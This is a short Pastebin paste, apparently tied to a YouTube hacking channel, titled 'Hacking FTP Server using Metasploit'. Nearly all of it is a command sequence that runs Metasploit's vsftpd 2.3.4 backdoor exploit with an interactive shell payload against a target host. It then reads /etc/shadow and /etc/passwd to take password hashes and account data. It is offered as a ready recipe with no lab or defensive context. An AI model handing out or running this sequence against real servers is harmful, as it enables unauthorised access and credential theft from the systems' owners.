Advertisement
Professional-hacker

Hacking FTP Server using Metasploit

Dec 9th, 2016
479
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.05 KB | None | 0 0
  1. ##################################################JokerSecurity###############################################################
  2. #
  3. # Title : Hacking FTP Server using Metasploit
  4. # Tested On : [ Kali-Linux ]
  5. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  6. # Myblog : http://kader-information.blogspot.com/
  7. # Link Video: https://www.youtube.com/watch?v=gXGL077H8uI
  8. ######################
  9. # [+] commands :
  10. ######################
  11. service postgresql start
  12. service metasploit start
  13. msfconsole
  14. db_status
  15. search vsftpd
  16. use exploit/unix/ftp/vsftpd_234_backdoor
  17. show options
  18. set RHOST ....
  19. set PAYLOAD cmd/unix/interact
  20. show options
  21. exploit
  22. =====
  23. sessions
  24. ifconfig
  25. uname -a
  26. cat /etc/shadow
  27. cat /etc/passwd
  28.  
  29. subscribe for my channel and page in facebook
  30.  
  31. # My Blogger : http://kader-information.blogspot.com/
  32.  
  33. # Page FacebOOk : https://www.facebook.com/AnonymousPalestine.vip
  34.  
  35. By <3
  36.  
  37. ##################################################JokerSecurity###############################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement